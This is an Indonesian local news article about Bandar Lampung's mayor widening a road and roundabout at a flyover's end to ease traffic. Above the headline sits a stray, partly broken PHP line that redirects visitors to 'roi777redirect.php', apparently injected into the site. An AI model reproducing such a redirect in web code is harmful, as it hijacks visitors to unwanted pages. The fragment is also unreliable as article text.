header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pelebaran Jalan Alternatif Atasi Macet -
Pelebaran Jalan Alternatif Atasi Macet

TRANSLAMPUNG.COM, BANDARLAMPUNG – Walikota Bandarlampung, Herman HN terus berupaya mencarikan solusi untuk warga Bandarlampung, agar tidak terjebak dalam kemacetan.

Setelah pembangunan beberapa Flyover, Herman HN juga melebarkan jalan-jalan alternatif.

Kali ini, pada Rabu (11/7), dalam sidak yang dilakukan, Herman HN kembali melebarkan jalan yang ada di ujung Flyover Jalan Cikditiro – Jalan Pramuka.

“Iya ini jalan diujung Flyover akan kita lebarkan lagi selebar 12 meter, dengan perkiraan panjang 100 meter. Pelebaran jalan ini untuk memudahkan pengendara agar mudah untuk memutar saat melintasi Flyover,” ujar dia, kemarin.

Saat ini, kata Herman, sudah ada bundaran dilokasi tersebut. Tapi, bundarannya akan kita lebarkan lagi, biar pengendara bisa bebar melakukan putaran.

“Kalau lahan untuk pelebaran, kebetulan lahannya milik Pemkot Bandarlampung. Sekarang sudah mulai kita kerjakan, nanti dipondasi dulu baru langsung kita timbun,” jelas dia.

Orang nomor satu di Kota Tapis Berseri ini memaparkan, pelebaran jalan ini dikerjakan dengan menggunakan anggaran dana rutin yang ada di Dinas Pekerjaan Umum (PU).

“Ya, mudah-mudahan pada September nanti sudah bisa digunakan. Untuk tiang listrik yang ada dilokasi pelebaran, dalam minggu ini akan segera dipindahkan oleh pihak PLN,” tutur dia. (jef/hkw)

News Reporter